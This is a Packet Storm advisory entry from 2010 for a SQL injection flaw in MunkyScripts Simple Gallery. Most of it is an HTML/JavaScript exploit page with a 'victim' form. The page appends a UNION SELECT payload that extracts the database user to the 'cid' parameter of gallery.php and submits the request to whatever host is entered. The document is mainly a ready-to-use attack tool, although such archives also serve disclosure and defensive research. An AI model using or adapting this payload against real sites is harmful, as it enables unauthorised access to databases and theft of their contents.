MunkyScripts Simple Gallery SQL Injection

2010-04-05T00:00:00
ID PACKETSTORM:88041
Type packetstorm
Reporter ItSecTeam
Modified 2010-04-05T00:00:00

Description

                                        
                                            `<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<title>coded by ahmadbady</title>  
  
<script language="JavaScript">  
  
//===========================================================================  
//( #Topic : MunkyScripts Simple Gallery  
//( #Bug type : SQL Injection Vulnerability  
//( #Download : http://www.munkyscripts.com/download/SimpleGallery.zip  
//( #Advisory :   
//===========================================================================  
//( #Author : ItSecTeam  
//( #Email : Bug@ITSecTeam.com  
//( #Website: http://www.itsecteam.com  
//( #Forum : http://forum.ITSecTeam.com  
//---------------------------------------------------------------------  
  
  
var sqll ="?cid='/**/UNION/**/SELECT/**/1,2,(concat_ws(0x3a,user())),4/*"  
  
function it(){  
xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+sqll;xpl.submit();   
}  
</script>  
  
</head>  
  
<body bgcolor="#FFFFFF">  
  
<p align="left"><font color="#0000FF">MunkyScripts Simple Gallery: SQL Injection   
Vulnerability</font></p>  
<p align="left"><font color="#0000FF">-----------------------------------</font></p>  
<form method="post" name="xpl" onSubmit="it();">  
<p align="left">  
<font   
size="2" face="Tahoma">  
victim:  
<input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000" value="http://127.0.0.1">   
path:  
<input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/SimpleGallery/">   
file:  
<input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000" value="gallery.php">   
</p>  
</p>  
<center>  
  
</p>  
<p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset"   
value="reset" name="B2" style="float: left"></p>  
</form>  
<p><br>  
 </p>  
</center>  
</body>  
  
</html>  
`